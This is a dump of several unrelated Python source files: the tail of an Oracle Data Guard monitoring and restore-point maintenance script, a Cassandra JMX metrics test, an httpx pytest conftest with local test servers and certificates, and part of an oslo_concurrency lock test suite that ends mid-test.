update_fb_retention(conn, server_id, flashback_retention)
#send mail
mail.send_alert_mail(server_id, host)
except Exception, e:
logger.error(e)
func.mysql_exec("rollback;",'')
sys.exit(1)
finally:
conn.close()
######################################################################################################
# function get_connect
######################################################################################################
def get_connect(server_id):
url = ""
host = ""
port = ""
username = ""
password = ""
tags = ""
server=func.mysql_query("select host,port,dsn,username,password,tags from db_cfg_oracle where id=%s;" %(server_id))
if server:
for row in server:
host=row[0]
port=row[1]
username=row[3]
password=row[4]
tags=row[5]
url=row[0]+':'+row[1]+'/'+row[2]
if host=="":
logger.warning("get host failed, exit!")
sys.exit(1)
try:
conn=cx_Oracle.connect(username,password,url, mode=cx_Oracle.SYSDBA) #获取connection对象
return conn
except Exception, e:
logger_msg="check oracle %s : %s" %(url,str(e).strip('\n'))
logger.warning(logger_msg)
try:
connect=0
func.mysql_exec("begin;",'')
sql="delete from oracle_status where server_id = %s; " %(server_id)
func.mysql_exec(sql,'')
sql="insert into oracle_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
func.mysql_exec("commit;",'')
except Exception, e:
func.mysql_exec("rollback;",'')
logger.error(str(e).strip('\n'))
finally:
func.check_db_status(server_id,host,port,tags,'oracle')
######################################################################################################
# function check_dataguard
######################################################################################################
def check_dataguard(dg_id, pri_id, sta_id, is_switch):
p_id = ""
s_id = ""
p_conn = ""
s_conn = ""
if is_switch == 0:
p_id = pri_id
s_id = sta_id
else:
p_id = sta_id
s_id = pri_id
try:
p_conn = get_connect(p_id)
s_conn = get_connect(s_id)
#check dataguard status
dg_p_curr_time = ""
dg_s_curr_time = ""
func.mysql_exec("begin;",'')
func.mysql_exec("insert into oracle_dg_p_status_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_dg_p_status where server_id in (%s, %s);" %(pri_id, sta_id),'')
func.mysql_exec('delete from oracle_dg_p_status where server_id in (%s, %s);' %(pri_id, sta_id),'')
func.mysql_exec("insert into oracle_dg_s_status_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_dg_s_status where server_id in (%s, %s);" %(pri_id, sta_id),'')
func.mysql_exec('delete from oracle_dg_s_status where server_id in (%s, %s);' %(pri_id, sta_id),'')
if p_conn:
# collect primary information
# dg_p_info = oracle.get_dg_p_info(p_conn, 1)
p_dest=func.mysql_single_query("select case when t.primary_db_id = %s then t.primary_db_dest else t.standby_db_dest end from db_cfg_oracle_dg t where t.id = %s;" %(p_id, dg_id))
if p_dest is None:
p_dest = 2
dg_p_info = oracle.get_dg_p_info_2(p_conn, p_dest)
dest_id = -1
transmit_mode = "null"
thread = -1
sequence = -1
archived_delay = -1
applied_delay = -1
current_scn = -1
if dg_p_info:
# get new check_seq
new_check_seq=func.mysql_single_query("select ifnull(max(check_seq),0)+1 from oracle_dg_p_status where server_id=%s;" %(p_id))
for line in dg_p_info:
dest_id=line[0]
transmit_mode=line[1]
thread=line[2]
sequence=line[3]
archived=line[4]
applied=line[5]
current_scn=line[6]
dg_p_curr_time=line[7]
archived_delay = oracle.get_log_archived_delay(p_conn, dest_id, thread)
applied_delay = oracle.get_log_applied_delay(p_conn, dest_id, thread)
#print thread, archived_delay, applied_delay
##################### insert data to mysql server#############################
#print dest_id, thread, sequence, archived, applied, current_scn, curr_db_time
sql = "insert into oracle_dg_p_status(server_id, check_seq, dest_id, transmit_mode, `thread#`, `sequence#`, curr_scn, curr_db_time, archived_delay, applied_delay) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (p_id, new_check_seq, dest_id, transmit_mode, thread, sequence, current_scn, dg_p_curr_time, archived_delay, applied_delay)
func.mysql_exec(sql,param)
logger.info("Gather primary database infomation for server: %s" %(p_id))
else:
logger.warning("Get no data from primary server: %s" %(p_id))
else:
##################### update data to db_status#############################
func.mysql_exec("update db_status set repl_delay=-1 where server_id = %s;" %(s_id),'')
if s_conn and p_conn:
dg_s_ms = oracle.get_dg_s_ms(s_conn)
dg_s_rate = oracle.get_dg_s_rate(s_conn)
dg_s_mrp = oracle.get_dg_s_mrp(s_conn)
dg_s_scn = oracle.get_database(s_conn, 'current_scn')
dg_s_al = oracle.get_dg_s_al(p_conn, dg_s_scn)
logger.info("Tye to get timestamp by scn(%s) from primary server %s for server %s" %(dg_s_scn, p_id, s_id))
dg_s_curr_time = oracle.get_time_by_scn(p_conn, dg_s_scn)
if dg_s_curr_time == None:
logger.info("Try to get timestamp by scn(%s) from v$restorepoint of standby server %s" %(dg_s_scn, s_id))
dg_s_curr_time = oracle.get_time_from_restorepoint(s_conn, dg_s_scn)
#logger.info("dg_s_curr_time: %s" %(dg_s_curr_time))
thread=-1
sequence=-1
block=-1
if dg_s_ms:
thread=dg_s_ms[0]
sequence=dg_s_ms[1]
block=dg_s_ms[2]
else:
if dg_s_ms:
thread=dg_s_al[0]
sequence=dg_s_al[1]
block=0
dg_delay=-1
if dg_s_curr_time ==None or dg_p_curr_time==None or dg_s_curr_time=="" or dg_p_curr_time == "":
dg_delay=-1
else:
p_time=datetime.datetime.strptime(dg_p_curr_time,'%Y-%m-%d %H:%M:%S')
s_time=datetime.datetime.strptime(dg_s_curr_time,'%Y-%m-%d %H:%M:%S')
dg_delay_days=(p_time - s_time).days
dg_delay_seconds=(p_time - s_time).seconds
dg_delay=dg_delay_days * 86400 + dg_delay_seconds
#logger.info("p_time: %s" %(p_time))
#logger.info("s_time: %s" %(s_time))
#logger.info("dg_delay_days: %s" %(dg_delay_days))
#logger.info("dg_delay_seconds: %s" %(dg_delay_seconds))
#logger.info("dg_delay: %s" %(dg_delay))
if dg_delay < 0:
dg_delay = 0
avg_apply_rate = -1
if dg_s_mrp==0:
avg_apply_rate=0
elif dg_s_rate:
avg_apply_rate=dg_s_rate[0]
##################### insert data to mysql server#############################
sql = "insert into oracle_dg_s_status(server_id, `thread#`, `sequence#`, `block#`, delay_mins, avg_apply_rate, curr_scn, curr_db_time, mrp_status) values(%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (s_id, thread, sequence, block, dg_delay, avg_apply_rate, dg_s_scn, dg_s_curr_time, dg_s_mrp)
func.mysql_exec(sql,param)
##################### update data to oracle_status#############################
sql = "update oracle_status set dg_stats=%s, dg_delay=%s where server_id = %s;"
param = (dg_s_mrp, dg_delay, s_id)
func.mysql_exec(sql,param)
# generate dataguard alert
logger.info("Generate dataguard alert for server: %s begin:" %(s_id))
alert.gen_alert_oracle_dg(s_id)
logger.info("Generate dataguard alert for server: %s end." %(s_id))
logger.info("Gather standby database infomation for server: %s" %(s_id))
func.mysql_exec("commit;",'')
#send mail
host = func.mysql_single_query("select host from db_cfg_oracle where id = %s;" %(s_id))
mail.send_alert_mail(s_id, host)
except Exception, e:
logger.error(e)
func.mysql_exec("rollback;",'')
finally:
if p_conn:
p_conn.close()
if s_conn:
s_conn.close()
######################################################################################################
# function create_restore_point
######################################################################################################
def create_restore_point(conn, flashback_retention):
cur = None
try:
last_restore_time = oracle.get_last_fbtime(conn)
db_time = oracle.get_sysdate(conn)
time_def = -1
if last_restore_time <> 'null':
time_def = (datetime.datetime.strptime(db_time,'%Y%m%d%H%M%S') - datetime.datetime.strptime(last_restore_time,'%Y%m%d%H%M%S')).seconds
# 没有闪回点,或者当前数据库时间和最后的闪回点时间相差1小时以上,创建闪回点
logger.info('last_restore_time: %s' %(last_restore_time))
logger.info('db_time: %s' %(db_time))
logger.info('time_def: %s' %(time_def))
if last_restore_time == 'null' or time_def > 3600:
db_unique_name = oracle.get_database(conn,'db_unique_name')
cur = conn.cursor()
try:
# 关闭MRP进程
stb_redo_count = oracle.get_standby_redo_count(conn)
#logger.info("type stb_redo_count : %s" %(type(stb_redo_count)))
mrp_status = oracle.get_dg_s_mrp(conn)
#logger.info('mrp_status: %s' %(mrp_status))
if mrp_status == 1:
str = 'alter database recover managed standby database cancel'
cur.execute(str)
#生成闪回点
restore_name = db_unique_name + db_time
str = 'create restore point %s' %(restore_name)
cur.execute(str)
finally:
# 如果一开始MRP进程是开启状态,则创建完成后,再次开启MRP进程
if mrp_status == 1:
if stb_redo_count == 0:
str = 'alter database recover managed standby database disconnect from session'
else:
str = 'alter database recover managed standby database using current logfile disconnect from session'
cur.execute(str)
except Exception, e:
logger.error(e)
finally:
if cur:
cur.close()
######################################################################################################
# function drop_expire_restore_point
######################################################################################################
def drop_expire_restore_point(host,port,dsn,username,password,server_id,tags):
try:
conn = get_connect(server_id)
cur = conn.cursor()
db_time = oracle.get_sysdate(conn)
open_mode = oracle.get_database(conn,'open_mode')
stb_redo_count = oracle.get_standby_redo_count(conn)
parameters = oracle.get_parameters(conn)
flashback_retention = parameters['db_flashback_retention_target']
p_str = """select concat(username, '/', password, '@', host, ':', port, '/', dsn) from db_cfg_oracle where id=%s """ %(server_id)
p_conn_str = func.mysql_single_query(p_str)
recover_str = ""
if stb_redo_count > 0:
recover_str = "alter database recover managed standby database using current logfile disconnect from session;"
else:
recover_str = "alter database recover managed standby database disconnect from session;"
# 每天0点,删除过期的闪回点
if db_time[8:10] == "00":
r_name_list = oracle.get_expire_restore_list(conn, flashback_retention)
if r_name_list:
logger.info("begin drop expire restore point for server: %s" %(server_id))
if open_mode == "MOUNTED" or open_mode == "READ WRITE":
for r_name in r_name_list:
str = 'drop restore point %s' %(r_name[0])
cur.execute(str)
logger.info('drop expire restore point: %s for %s' %(r_name[0], server_id))
elif open_mode == "READ ONLY" or open_mode == "READ ONLY WITH APPLY":
sqlplus = Popen(["sqlplus", "-S", p_conn_str, "as", "sysdba"], stdout=PIPE, stdin=PIPE)
sqlplus.stdin.write(bytes("shutdown immediate"+os.linesep))
sqlplus.stdin.write(bytes("startup mount"+os.linesep))
out, err = sqlplus.communicate()
logger.info(out)
logger.error(err)
try:
conn = get_connect(server_id)
cur = conn.cursor()
for r_name in r_name_list:
str = 'drop restore point %s' %(r_name[0])
cur.execute(str)
logger.info('drop expire restore point: %s for %s' %(r_name[0], server_id))
except Exception, e:
logger.error(e)
finally:
sqlplus = Popen(["sqlplus", "-S", p_conn_str, "as", "sysdba"], stdout=PIPE, stdin=PIPE)
sqlplus.stdin.write(bytes("alter database open;"+os.linesep))
sqlplus.stdin.write(bytes(recover_str+os.linesep))
out, err = sqlplus.communicate()
logger.info(out)
logger.error(err)
logger.info("end drop expire restore point for server: %s" %(server_id))
except Exception, e:
logger.error(e)
finally:
if cur:
cur.close()
######################################################################################################
# function update_fb_retention
######################################################################################################
def update_fb_retention(conn, server_id, old_value):
cur = None
try:
sql = "select fb_retention from db_cfg_oracle_dg where primary_db_id=%s or standby_db_id=%s limit 1;" %(server_id,server_id)
res = func.mysql_single_query(sql)
if res:
sta_retention = res*24*60
# 如果dg配置的闪回保留时间和数据库里面的不一致,则更新数据库 flashback_retention参数
logger.info('dg flashback retention config: %s' %(sta_retention))
logger.info('db_flashback_retention_target: %s' %(old_value))
if int(sta_retention) <> int(old_value):
logger.info('Update db_flashback_retention_target to %s' %(sta_retention))
cur = conn.cursor()
str = 'alter system set db_flashback_retention_target=%s scope=both' %(sta_retention)
cur.execute(str)
except Exception, e:
logger.error(e)
finally:
if cur:
cur.close()
######################################################################################################
# function clean_invalid_db_status
######################################################################################################
def clean_invalid_db_status():
try:
func.mysql_exec("insert into oracle_status_his SELECT *,sysdate() from oracle_status where server_id not in(select id from db_cfg_oracle where is_delete = 0);",'')
func.mysql_exec('delete from oracle_status where server_id not in(select id from db_cfg_oracle where is_delete = 0);','')
func.mysql_exec("insert into oracle_tablespace_his SELECT *,sysdate() from oracle_tablespace where server_id not in(select id from db_cfg_oracle where is_delete = 0);",'')
func.mysql_exec('delete from oracle_tablespace where server_id not in(select id from db_cfg_oracle where is_delete = 0);','')
func.mysql_exec("insert into oracle_diskgroup_his SELECT *,sysdate() from oracle_diskgroup where server_id not in(select id from db_cfg_oracle where is_delete = 0);",'')
func.mysql_exec('delete from oracle_diskgroup where server_id not in(select id from db_cfg_oracle where is_delete = 0);','')
func.mysql_exec("delete from db_status where db_type = 'oracle' and server_id not in(select id from db_cfg_oracle where is_delete = 0);",'')
func.mysql_exec("delete from db_status where db_type = 'oracle' and host not in(select host from db_cfg_oracle where is_delete = 0);",'')
except Exception, e:
logger.error(e)
finally:
pass
######################################################################################################
# function main
######################################################################################################
def main():
#get oracle servers list
servers=func.mysql_query("select id,host,port,dsn,username,password,tags from db_cfg_oracle where is_delete=0 and monitor=1;")
logger.info("check oracle controller start.")
if servers:
func.update_check_time('oracle')
plist = []
for row in servers:
server_id=row[0]
host=row[1]
port=row[2]
dsn=row[3]
username=row[4]
password=row[5]
tags=row[6]
p = Process(target = check_oracle, args = (host,port,dsn,username,password,server_id,tags))
plist.append(p)
p.start()
#time.sleep(10)
#for p in plist:
# p.terminate()
for p in plist:
p.join()
else:
logger.warning("check oracle: not found any servers")
logger.info("check oracle controller finished.")
# Clean invalid data
logger.info("Clean invalid oracle status start.")
clean_invalid_db_status()
logger.info("Clean invalid oracle status finished.")
#check for dataguard group
dg_list=func.mysql_query("select id, group_name, primary_db_id, standby_db_id, is_switch from db_cfg_oracle_dg where is_delete=0 and on_process = 0;")
logger.info("check oracle dataguard start.")
if dg_list:
plist_2 = []
for row in dg_list:
dg_id=row[0]
dg_name=row[1]
pri_id=row[2]
sta_id=row[3]
is_switch=row[4]
p2 = Process(target = check_dataguard, args = (dg_id,pri_id,sta_id,is_switch))
plist_2.append(p2)
p2.start()
for p2 in plist_2:
p2.join()
else:
logger.warning("check oracle dataguard: not found any dataguard group")
logger.info("check oracle dataguard finished.")
# drop expire restore point
logger.info("drop expire restore point start.")
if servers:
plist_3 = []
for row in servers:
server_id=row[0]
host=row[1]
port=row[2]
dsn=row[3]
username=row[4]
password=row[5]
tags=row[6]
p3 = Process(target = drop_expire_restore_point, args = (host,port,dsn,username,password,server_id,tags))
plist_3.append(p3)
p3.start()
for p3 in plist_3:
p3.join()
else:
logger.warning("drop expire restore point: not found any dataguard group")
logger.info("drop expire restore point finished.")
if __name__=='__main__':
main()
|
test_cassandra.py
|
# stdlib
import threading
import time
from types import ListType
import unittest
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
from dogstatsd import Server
from jmxfetch import JMXFetch
from tests.checks.common import Fixtures
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = Fixtures.directory()
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
self.assertTrue(len([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t['tags']]) > 40, metrics)
|
conftest.py
|
import asyncio
import os
import threading
import time
import typing
import pytest
import trustme
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
)
from uvicorn.config import Config
from uvicorn.main import Server
from httpx import URL, AsyncioBackend
ENVIRONMENT_VARIABLES = (
"SSL_CERT_FILE",
"REQUESTS_CA_BUNDLE",
"CURL_CA_BUNDLE",
"HTTP_PROXY",
"HTTPS_PROXY",
"ALL_PROXY",
"NO_PROXY",
"SSLKEYLOGFILE",
)
@pytest.fixture(scope="function", autouse=True)
def clean_environ() -> typing.Dict[str, typing.Any]:
"""Keeps os.environ clean for every test without having to mock os.environ"""
original_environ = os.environ.copy()
for key in ENVIRONMENT_VARIABLES:
os.environ.pop(key, None)
yield
os.environ.clear()
os.environ.update(original_environ)
@pytest.fixture(params=[pytest.param(AsyncioBackend, marks=pytest.mark.asyncio)])
def backend(request):
backend_cls = request.param
return backend_cls()
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"] == "/slow_response":
await slow_response(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
elif scope["path"].startswith("/echo_headers"):
await echo_headers(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await asyncio.sleep(0.1)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
async def echo_headers(scope, receive, send):
body: bytes = b""
more_body = scope.get("headers", [])
for h in more_body:
name, value = h[0], h[1]
value = f"{name.capitalize().decode()}: {value.decode()}\n"
body += value.encode()
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
class CAWithPKEncryption(trustme.CA):
"""Implementation of trustme.CA() that can emit
private keys that are encrypted with a password.
"""
@property
def encrypted_private_key_pem(self):
return trustme.Blob(
self._private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
SERVER_SCOPE = "session"
@pytest.fixture(scope=SERVER_SCOPE)
def example_cert():
ca = CAWithPKEncryption()
ca.issue_cert("example.org")
return ca
@pytest.fixture(scope=SERVER_SCOPE)
def cert_pem_file(example_cert):
with example_cert.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_private_key_file(example_cert):
with example_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_encrypted_private_key_file(example_cert):
with example_cert.encrypted_private_key_pem.tempfile() as tmp:
yield tmp
class TestServer(Server):
@property
def url(self) -> URL:
protocol = "https" if self.config.is_ssl else "http"
return URL(f"{protocol}://{self.config.host}:{self.config.port}/")
def install_signal_handlers(self) -> None:
# Disable the default installation of handlers for signals such as SIGTERM,
# because it can only be done in the main thread.
pass
async def serve(self, sockets=None):
self.restart_requested = asyncio.Event()
loop = asyncio.get_event_loop()
tasks = {
loop.create_task(super().serve(sockets=sockets)),
loop.create_task(self.watch_restarts()),
}
await asyncio.wait(tasks)
async def restart(self) -> None:
# Ensure we are in an asyncio environment.
assert asyncio.get_event_loop() is not None
# This may be called from a different thread than the one the server is
# running on. For this reason, we use an event to coordinate with the server
# instead of calling shutdown()/startup() directly.
self.restart_requested.set()
self.started = False
while not self.started:
await asyncio.sleep(0.5)
async def watch_restarts(self):
while True:
if self.should_exit:
return
try:
await asyncio.wait_for(self.restart_requested.wait(), timeout=0.1)
except asyncio.TimeoutError:
continue
self.restart_requested.clear()
await self.shutdown()
await self.startup()
@pytest.fixture
def restart(backend):
"""Restart the running server from an async test function.
This fixture deals with possible differences between the environment of the
test function and that of the server.
"""
async def restart(server):
await backend.run_in_threadpool(AsyncioBackend().run, server.restart)
return restart
def serve_in_thread(server: Server):
thread = threading.Thread(target=server.run)
thread.start()
try:
while not server.started:
time.sleep(1e-3)
yield server
finally:
server.should_exit = True
thread.join()
@pytest.fixture(scope=SERVER_SCOPE)
def server():
config = Config(app=app, lifespan="off", loop="asyncio")
server = TestServer(config=config)
yield from serve_in_thread(server)
@pytest.fixture(scope=SERVER_SCOPE)
def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
port=8001,
loop="asyncio",
)
server = TestServer(config=config)
yield from serve_in_thread(server)
|
test_lockutils.py
|
# Copyright 2011 Justin Santa Barbara
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import multiprocessing
import os
import signal
import subprocess
import sys
import tempfile
import threading
import time
from oslo_config import cfg
from oslotest import base as test_base
import six
from oslo_concurrency.fixture import lockutils as fixtures
from oslo_concurrency import lockutils
from oslo_config import fixture as config
if sys.platform == 'win32':
import msvcrt
else:
import fcntl
def lock_file(handle):
if sys.platform == 'win32':
msvcrt.locking(handle.fileno(), msvcrt.LK_NBLCK, 1)
else:
fcntl.flock(handle, fcntl.LOCK_EX | fcntl.LOCK_NB)
def unlock_file(handle):
if sys.platform == 'win32':
msvcrt.locking(handle.fileno(), msvcrt.LK_UNLCK, 1)
else:
fcntl.flock(handle, fcntl.LOCK_UN)
def lock_files(handles_dir, out_queue):
with lockutils.lock('external', 'test-', external=True):
# Open some files we can use for locking
handles = []
for n in range(50):
path = os.path.join(handles_dir, ('file-%s' % n))
handles.append(open(path, 'w'))
# Loop over all the handles and try locking the file
# without blocking, keep a count of how many files we
# were able to lock and then unlock. If the lock fails
# we get an IOError and bail out with bad exit code
count = 0
for handle in handles:
try:
lock_file(handle)
count += 1
unlock_file(handle)
except IOError:
os._exit(2)
finally:
handle.close()
return out_queue.put(count)
class LockTestCase(test_base.BaseTestCase):
def setUp(self):
super(LockTestCase, self).setUp()
self.config = self.useFixture(config.Config(lockutils.CONF)).config
def test_synchronized_wrapped_function_metadata(self):
@lockutils.synchronized('whatever', 'test-')
def foo():
"""Bar."""
pass
self.assertEqual('Bar.', foo.__doc__, "Wrapped function's docstring "
"got lost")
self.assertEqual('foo', foo.__name__, "Wrapped function's name "
"got mangled")
def test_lock_internally_different_collections(self):
s1 = lockutils.Semaphores()
s2 = lockutils.Semaphores()
trigger = threading.Event()
who_ran = collections.deque()
def f(name, semaphores, pull_trigger):
with lockutils.internal_lock('testing', semaphores=semaphores):
if pull_trigger:
trigger.set()
else:
trigger.wait()
who_ran.append(name)
threads = [
threading.Thread(target=f, args=(1, s1, True)),
threading.Thread(target=f, args=(2, s2, False)),
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual([1, 2], sorted(who_ran))
def test_lock_internally(self):
"""We can lock across multiple threads."""
saved_sem_num = len(lockutils._semaphores)
seen_threads = list()
def f(_id):
with lockutils.lock('testlock2', 'test-', external=False):
for x in range(10):
seen_threads.append(_id)
threads = []
for i in range(10):
thread = threading.Thread(target=f, args=(i,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
self.assertEqual(100, len(seen_threads))
# Looking at the seen threads, split it into chunks of 10, and verify
# that the last 9 match the first in each chunk.
for i in range(10):
for j in range(9):
self.assertEqual(seen_threads[i * 10],
seen_threads[i * 10 + 1 + j])
self.assertEqual(saved_sem_num, len(lockutils._semaphores),
"Semaphore leak detected")
def test_lock_internal_fair(self):
"""Check that we're actually fair."""
def f(_id):
with lockutils.lock('testlock', 'test-',
external=False, fair=True):
lock_holder.append(_id)
lock_holder = []
threads = []
# While holding the fair lock, spawn a bunch of threads that all try
# to acquire the lock. They will all block. Then release the lock
# and see what happens.
with lockutils.lock('testlock', 'test-', external=False, fair=True):
for i in range(10):
thread = threading.Thread(target=f, args=(i,))
threads.append(thread)
thread.start()
# Allow some time for the new thread to get queued onto the
# list of pending writers before continuing. This is gross
# but there's no way around it without using knowledge of
# fasteners internals.
time.sleep(0.5)
# Wait for all threads.
for thread in threads:
thread.join()
self.assertEqual(10, len(lock_holder))
# Check that the threads each got the lock in fair order.
for i in range(10):
self.assertEqual(i, lock_holder[i])
def test_fair_lock_with_semaphore(self):
def do_test():
s = lockutils.Semaphores()
with lockutils.lock('testlock', 'test-', semaphores=s, fair=True):
pass
self.assertRaises(NotImplementedError, do_test)
def test_nested_synchronized_external_works(self):
"""We can nest external syncs."""
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
sentinel = object()
@lockutils.synchronized('testlock1', 'test-', external=True)
def outer_lock():
@lockutils.synchronized('testlock2', 'test-', external=True)
def inner_lock():
return sentinel
return inner_lock()
self.assertEqual(sentinel, outer_lock())
def _do_test_lock_externally(self):
"""We can lock across multiple processes."""
children = []
for n in range(50):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=lock_files,
args=(tempfile.mkdtemp(), queue))
proc.start()
children.append((proc, queue))
for child, queue in children:
child.join()
count = queue.get(block=False)
self.assertEqual(50, count)
def test_lock_externally(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
self._do_test_lock_externally()
def test_lock_externally_lock_dir_not_exist(self):
lock_dir = tempfile.mkdtemp()
os.rmdir(lock_dir)
self.config(lock_path=lock_dir, group='oslo_concurrency')
self._do_test_lock_externally()
def test_lock_with_prefix(self):
# TODO(efried): Embetter this test
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
foo = lockutils.lock_with_prefix('mypfix-')
with foo('mylock', external=True):
# We can't check much
pass
def test_synchronized_with_prefix(self):
lock_name = 'mylock'
lock_pfix = 'mypfix-'
foo = lockutils.synchronized_with_prefix(lock_pfix)
@foo(lock_name, external=True)
def bar(dirpath, pfix, name):
return True
lock_dir = tempfile.mkdtemp()
self.config(lock_path=lock_dir, group='oslo_concurrency')
self.assertTrue(bar(lock_dir, lock_pfix, lock_name))
def test_synchronized_without_prefix(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
@lockutils.synchronized('lock', external=True)
def test_without_prefix():
# We can't check much
pass
test_without_prefix()
def test_synchronized_prefix_without_hypen(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
@lockutils.synchronized('lock', 'hypen', True)
def test_without_hypen():
# We can't check much
pass
test_without_hypen()
def test_contextlock(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
# Note(flaper87): Lock is not external, which means
# a semaphore will be yielded
with lockutils.lock("test") as sem:
if six.PY2:
self.assertIsInstance(sem, threading._Semaphore)
else:
self.assertIsInstance(sem, threading.Semaphore)
# NOTE(flaper87): Lock is external so an InterProcessLock
# will be yielded.
with lockutils.lock("test2", external=True) as lock:
self.assertTrue(lock.exists())
with lockutils.lock("test1", external=True) as lock1:
self.assertIsInstance(lock1, lockutils.InterProcessLock)
def test_contextlock_unlocks(self):
self.config(lock_path=tempfile.mkdtemp(), group='oslo_concurrency')
with lockutils.lock("test") as sem:
if six.PY2:
self.assertIsInstance(sem, threading._Semaphore)
else:
self.assertIsInstance(sem, threading.Semaphore)
with lockutils.lock("test2", external=True) as lock:
self.assertTrue(lock.exists())
# NOTE(flaper87): Lock should be free
with lockutils.lock("test2", external=True) as lock:
self.assertTrue(lock.exists())
# NOTE(flaper87): Lock should be free
# but semaphore should already exist.
with lockutils.lock("test") as sem2:
self.assertEqual(sem, sem2)
def _test_remove_lock_external_file(self, lock_dir, use_external=False):
lock_name = 'mylock'
lock_pfix = 'mypfix-remove-lock-test-'
if use_external:
lock_path = lock_dir
else:
lock_path = None
lockutils.remove_external_lock_file(lock_name, lock_pfix, lock_path)
for ent in os.listdir(lock_dir):
self.assertRaises(OSError, ent.startswith, lock_pfix)
def test_remove_lock_external_file(self):
lock_dir = tempfile.mkdtemp()
self.config(lock_path=lock_dir, group='oslo_concurrency')
self._test_remove_lock_external_file(lock_dir)
def test_remove_lock_external_file_lock_path(self):
self._test_remove_lock_external_file(tempfile.mkdtemp(),
use_external=True)
def test_no_slash_in_b64(self):
# base64(sha1(foobar)) has a slash in it
with lockutils.lock("foobar"):
pass
def test_deprecated_names(self):
paths = self.create_tempfiles([['fake.conf', '\n'.join([
'[DEFAULT]',
'lock_path=foo',
'disable_process_locking=True'])
]])
conf = cfg.ConfigOpts()
conf(['--config-file', paths[0]])
conf.register_opts(lockutils._opts, 'oslo_concurrency')
self.assertEqual('foo', conf.oslo_concurrency.lock_path)
self.assertTrue(conf.oslo_concurrency.disable_process_locking)
class FileBasedLockingTestCase(test_base.BaseTestCase):
def setUp(self):
super(FileBasedLockingTestCase, self).setUp()
self.lock_dir = tempfile.mkdtemp()
def test_lock_file_exists(self):
lock_file = os.path.join(self.lock_dir, 'lock-file')
@lockutils.synchronized('lock-file', external=True,
lock_path=self.lock_dir)
def foo():
self.assertTrue(os.path.exists(lock_file))
foo()
def test_interprocess_lock(self):
lock_file = os.path.join(self.lock_dir, 'processlock')
pid = os.fork()
if pid:
# Make sure the child grabs the lock first
start = time.time()
while not os.path.exists(lock_file):
if time.time() - start > 5:
self.fail('Timed out waiting for child to grab lock')
